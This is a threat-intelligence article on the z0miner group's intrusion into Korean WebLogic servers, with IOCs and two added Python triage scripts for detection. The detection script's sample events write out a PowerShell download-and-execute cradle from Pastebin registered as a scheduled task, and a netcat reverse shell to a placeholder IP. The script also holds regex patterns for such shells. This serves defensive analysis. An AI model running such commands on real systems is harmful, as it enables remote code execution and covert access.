Web Server Compromised by Hackers for z0Miner Malware Deployment

The threat actor tracked as "z0miner" has been observed targeting WebLogic servers in Korea to distribute malware, including cryptocurrency miners, network utilities, and scripts used to launch follow-on attacks. The group has a history of exploiting vulnerable servers, including Atlassian Confluence and Apache ActiveMQ instances as well as applications exposed to Log4j vulnerabilities, among others.

First identified by researchers at Tencent in 2020, z0miner gained notoriety for exploiting CVE-2020-14882 and CVE-2020-14883 on Oracle WebLogic servers, a pair of flaws that together allow unauthenticated remote code execution through the WebLogic administration console.

More recently, researchers at AhnLab's ASEC observed the group shift to targeting WebLogic servers in Korea. During the investigation they found the actor using FRP (Fast Reverse Proxy), NetCat, and AnyDesk on compromised hosts.

z0Miner Malware Deployment

As reported by Cyber Security News, the Korean WebLogic servers the actor went after were poorly configured and exposed more server information than they should have.

From that exposed information the actor could determine the Tomcat version and the server version of each target. With that in hand, they used a webshell, FRP, and NetCat to extend the compromise.

Source: AhnLab

Exploitation Methods

Webshell

The threat actor exploited the WebLogic vulnerability CVE-2020-14882 to plant a JSP webshell on the vulnerable server, giving them persistent command execution on the host.

Three distinct webshells were deployed: JSP File Browser, Shack2, and Behinder. Notably, none of them was detected by anti-malware products at the time.

Fast Reverse Proxy (FRP)

FRP is an open-source reverse proxy. The actor used it to expose Remote Desktop Protocol (RDP) on the compromised host through an attacker-controlled frps server, so the host could be reached over RDP from outside even though inbound connections to it were not otherwise permitted. Both the stock frpc client and a customized build were used. The stock frpc reads its settings (server address, port, and the local service to forward) from an *.ini file before connecting, whereas the customized frpc carries those settings inside the binary and runs without a separate configuration file.
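The frpc.ini listed among the indicators is what a responder would pull off a compromised host to learn where the tunnel terminates and which local service it exposes. The following is an added example (not code from the article or from AhnLab) that parses an frpc-style INI file and flags proxy sections forwarding remote-access ports; the embedded sample configuration is constructed for illustration, and its server address, token and port numbers are assumptions rather than indicators from the report.

```python
"""Triage an frpc-style INI file for proxies that expose remote-access services.

Added example, not code from the article or from AhnLab. The sample
configuration below is constructed; its server address, token and port
numbers are assumptions, not indicators from the report.
"""
import configparser
from typing import Dict, List

# Local services an attacker typically tunnels out through frp.
# (assumption: a triage shortlist, not an exhaustive list)
SENSITIVE_PORTS: Dict[int, str] = {
    3389: "RDP",
    445: "SMB",
    5985: "WinRM",
    5986: "WinRM (TLS)",
    22: "SSH",
}

# Constructed sample in the INI layout the stock frpc client reads:
# a [common] section naming the frps server, then one section per proxy.
SAMPLE_FRPC_INI = """
[common]
server_addr = 203.0.113.10
server_port = 7000
token = example-token

[rdp]
type = tcp
local_ip = 127.0.0.1
local_port = 3389
remote_port = 6000

[web]
type = tcp
local_ip = 127.0.0.1
local_port = 8080
remote_port = 6001
"""


def parse_frpc_ini(text: str) -> configparser.ConfigParser:
    """Parse frpc INI text. frp uses '=' separators and '#' or ';' comments."""
    cfg = configparser.ConfigParser(interpolation=None)
    cfg.read_string(text)
    return cfg


def exposed_services(text: str) -> List[dict]:
    """Return every proxy section that forwards a sensitive local port to frps."""
    cfg = parse_frpc_ini(text)
    common = cfg["common"] if cfg.has_section("common") else {}
    frps = f"{common.get('server_addr', '?')}:{common.get('server_port', '7000')}"
    findings = []
    for name in cfg.sections():
        if name == "common":
            continue
        sec = cfg[name]
        local_port = sec.getint("local_port", fallback=0)
        if local_port in SENSITIVE_PORTS:
            findings.append({
                "proxy": name,
                "service": SENSITIVE_PORTS[local_port],
                "local": f"{sec.get('local_ip', '127.0.0.1')}:{local_port}",
                # remote_port is the port opened on frps that the attacker connects to
                "remote_port": sec.getint("remote_port", fallback=0),
                "frps": frps,
            })
    return findings


if __name__ == "__main__":
    for f in exposed_services(SAMPLE_FRPC_INI):
        print(f"[{f['proxy']}] {f['service']} {f['local']} -> {f['frps']} "
              f"(remote_port {f['remote_port']})")
```

The `server_addr` value is the pivot for the rest of the investigation: it is the attacker's frps endpoint, and the host's outbound connection to it on `server_port` is what to look for in firewall and proxy logs. A customized frpc build, as described above, will not leave this file behind, so the same values then have to be recovered from the binary's strings or from network telemetry.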

NetCat

Netcat reads and writes data over network connections and is bundled with many webshells. Used as a reverse shell, it makes the compromised host connect outbound to the attacker and attach a command interpreter to that connection, which sidesteps inbound firewall rules and gives the attacker an interactive shell on the host.

Miner (XMRig)

z0miner uses different XMRig builds for Windows and Linux: XMRig 6.18.0 on Windows and 6.18.1 on Linux.

To keep the miner running, the threat actor registered either a scheduled task (schtasks) or a WMI event filter that fetches a PowerShell script from a designated Pastebin address and executes it. The miner configuration carries the actor's Monero wallet and mining pool address.

AnyDesk was also dropped through the webshell, mainly in intrusions that exploited the Apache ActiveMQ vulnerability (CVE-2023-46604).
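The persistence mechanism described above and the NetCat reverse shell described earlier both show up as process-creation events, and the IOC list below shows why name-based matching alone is not enough: netcat was renamed to userinit.exe and frpc to svcho.exe. The following is an added example (not code from the article or from AhnLab) that classifies constructed process-creation events by those patterns: a scheduled task or WMI subscription that runs PowerShell, a download-and-execute cradle pointed at pastebin.com, a shell attached to a network socket, and file hashes from the report's IOC list. The sample events, their paths and the Pastebin URL path are made up; only the MD5 values come from the IOC list.

```python
"""Flag z0miner-style persistence and remote-shell patterns in process events.

Added example, not code from the article or from AhnLab. The sample events
are constructed (paths, hostnames and the Pastebin path are made up); only
the MD5 values in KNOWN_BAD_MD5 are taken from the report's IOC list.
"""
import re
from typing import Dict, List

# MD5s from the report's IOC list, keyed by what the file really is.
KNOWN_BAD_MD5: Dict[str, str] = {
    "523613a7b9dfa398cbd5ebd2dd0f4f38": "Netcat renamed to userinit.exe",
    "7e5cc9d086c93fa1af1d3453b3c6946e": "frpc renamed to svcho.exe",
    "e60d8a3f2190d78e94c7b952b72916ac": "frp5.exe",
}

SCHTASKS_CREATE = re.compile(r"schtasks(\.exe)?\s+/create\b", re.IGNORECASE)
# Classes involved in a WMI permanent event subscription.
WMI_SUBSCRIPTION = re.compile(
    r"__EventFilter|CommandLineEventConsumer|ActiveScriptEventConsumer|__FilterToConsumerBinding",
    re.IGNORECASE)
# A PowerShell download cradle whose target is a paste site.
PASTE_CRADLE = re.compile(
    r"(DownloadString|DownloadFile|Invoke-WebRequest|iwr|Invoke-RestMethod|irm).{0,200}pastebin\.com",
    re.IGNORECASE)
# "-e cmd.exe" / "-c /bin/sh" style: a command interpreter attached to a socket,
# matched on the arguments so a renamed netcat is still caught.
SHELL_ATTACHED = re.compile(
    r"\s-[a-z]*[ec]\s+(\S*cmd(\.exe)?|/bin/(ba)?sh|powershell(\.exe)?)\b", re.IGNORECASE)

# Constructed sample events (one per line of a process-creation log).
SAMPLE_EVENTS = [
    {"id": "e1", "image": r"C:\Windows\System32\schtasks.exe", "md5": "0" * 32,
     "cmdline": r'''schtasks /create /sc minute /mo 30 /tn "Update" /tr "powershell -w hidden -c IEX((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/EXAMPLE'))" /ru SYSTEM'''},
    {"id": "e2", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "md5": "0" * 32,
     "cmdline": r'''powershell -NoP -c "Set-WmiInstance -Namespace root\subscription -Class CommandLineEventConsumer -Arguments @{Name='m'; CommandLineTemplate='powershell -c IEX((New-Object Net.WebClient).DownloadString(''https://pastebin.com/raw/EXAMPLE''))'}"'''},
    {"id": "e3", "image": r"C:\Windows\Temp\userinit.exe", "md5": "523613a7b9dfa398cbd5ebd2dd0f4f38",
     "cmdline": r"C:\Windows\Temp\userinit.exe 203.0.113.10 4444 -e cmd.exe"},
    {"id": "e4", "image": r"C:\Windows\System32\schtasks.exe", "md5": "0" * 32,
     "cmdline": r'''schtasks /create /sc daily /tn "Backup" /tr "C:\Tools\backup.exe"'''},
    {"id": "e5", "image": r"C:\Users\Public\svcho.exe", "md5": "7e5cc9d086c93fa1af1d3453b3c6946e",
     "cmdline": r"C:\Users\Public\svcho.exe -c C:\Users\Public\frpc.ini"},
]


def classify(event: Dict[str, str]) -> List[str]:
    """Return the list of reasons an event is suspicious (empty if none)."""
    tags: List[str] = []
    cmd = event.get("cmdline", "")
    md5 = event.get("md5", "").lower()
    if md5 in KNOWN_BAD_MD5:
        tags.append(f"ioc-hash: {KNOWN_BAD_MD5[md5]}")
    if SCHTASKS_CREATE.search(cmd) and "powershell" in cmd.lower():
        tags.append("persistence: scheduled task running PowerShell")
    if WMI_SUBSCRIPTION.search(cmd):
        tags.append("persistence: WMI event subscription")
    if PASTE_CRADLE.search(cmd):
        tags.append("download-and-execute from pastebin.com")
    if SHELL_ATTACHED.search(cmd):
        tags.append("shell attached to network socket (netcat-style)")
    return tags


def triage(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Map event id -> reasons, keeping only events that triggered something."""
    result = {}
    for ev in events:
        tags = classify(ev)
        if tags:
            result[ev["id"]] = tags
    return result


if __name__ == "__main__":
    for ev_id, reasons in triage(SAMPLE_EVENTS).items():
        print(ev_id, "->", "; ".join(reasons))
```

Event e4 (a scheduled task that runs an ordinary executable) produces no hit, which is the point of requiring PowerShell in the task action rather than alerting on every `schtasks /create`. Event e5 is caught only by its hash: `frpc -c frpc.ini` looks like any other tool reading a config file, so the MD5 list from the report is what makes it visible.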

Indicators of Compromise (z0Miner)

File Detection

  • HackTool/Win.Netcat (2022.10.18.03)
  • Win-Trojan/Miner3.Exp (2022.06.24.02)
  • Downloader/Shell.Miner.SC197168 (2024.02.27.01)
  • Data/JSON.Miner (2024.02.27.01)
  • Data/JSON.Miner (2024.02.27.01)
  • Trojan/PowerShell.Miner (2024.02.27.01)
  • Trojan/Script.z0Miner.SC197169 (2024.02.27.01)
  • Trojan/Win.FRP (2024.02.27.01)
  • Trojan/Shell.Miner.SC197170 (2024.02.27.01)
  • Trojan/Shell.Miner.SC197171 (2024.02.27.01)
  • Trojan/Shell.Agent.SC197172 (2024.02.27.01)
  • Downloader/Shell.Miner.SC197173 (2024.02.27.01)
  • WebShell/JSP.Generic.S1866 (2024.02.27.00)
  • Linux/CoinMiner.Gen2 (2022.11.24.02)
  • WebShell/JSP.FileBrowser.SC197174 (2024.02.27.01)
  • WebShell/JSP.Generic.S1957 (2024.02.27.00)
  • Trojan/Shell.Agent.SC197175 (2024.02.27.03)
  • Downloader/PowerShell.Miner (2024.02.27.03)
  • CoinMiner/Shell.Generic.S2078 (2024.02.27.00)
  • Downloader/PowerShell.Miner.SC197176 (2024.02.27.01)

MD5

  • 523613a7b9dfa398cbd5ebd2dd0f4f38 : userinit.exe(Netcat)
  • 2a0d26b8b02bb2d17994d2a9a38d61db : x.rar(XMRig, exe)
  • 4cd78b6cc1e3d3dde3e47852056f78ad : al.txt
  • 085c68576c60ca0361b9778268b0b3b9 : (config.json)
  • b6aaced82b7c663a5922ce298831885a : (config.json)
  • 7b2793902d106ba11d3369dff5799aa5 : cpu.ps1
  • ad33f965d406c8f328bd71aff654ec4c : frpc.ini
  • 7e5cc9d086c93fa1af1d3453b3c6946e : svcho.exe(frpc)
  • e60d8a3f2190d78e94c7b952b72916ac : frp5.exe
  • 8434de0c058abb27c928a10b3ab79ff8 : l.txt
  • 90b74cdc4b7763c6b25fdcd27f26377f : l.txt
  • 83e163afd5993320882452453c214932 : lcpu.txt
  • a0766ad196626f28919c904d2ced6c85 : ll.txt
  • 903fce58cb4bfc39786c77fe0b5d9486 : pan.rar(Shack2 WebShell)
  • c2fb307aee872df475a7345d641d72da : s.rar(XMRig, ELF)
  • 88d49dad824344b8d6103c96b4f81d19 : session.rar(Zubin WebShell)
  • efc2a705c858ed08a76d20a8f5a11b1b : shell.rar(Behinder WebShell)
  • 98e167e7c2999cbea30cc9342e944a4c : solr.sh
  • 575575f5b6f9c4f7149ed6d86fb16c0f : st.ps1
  • 547c02a9b01194a0fcbfef79aaa52e38 : st2.txt
  • fd0fe2a3d154c412be6932e75a9a5ca1 : stt.txt

C&C URL

(Korean web servers exploited and used as download servers are shown only on TIP.)

  • 107.180.100[.]247:88
  • 15.235.22[.]212:5690
  • 15.235.22[.]213:59240

About the Author:

FirstHackersNews- Identifies Security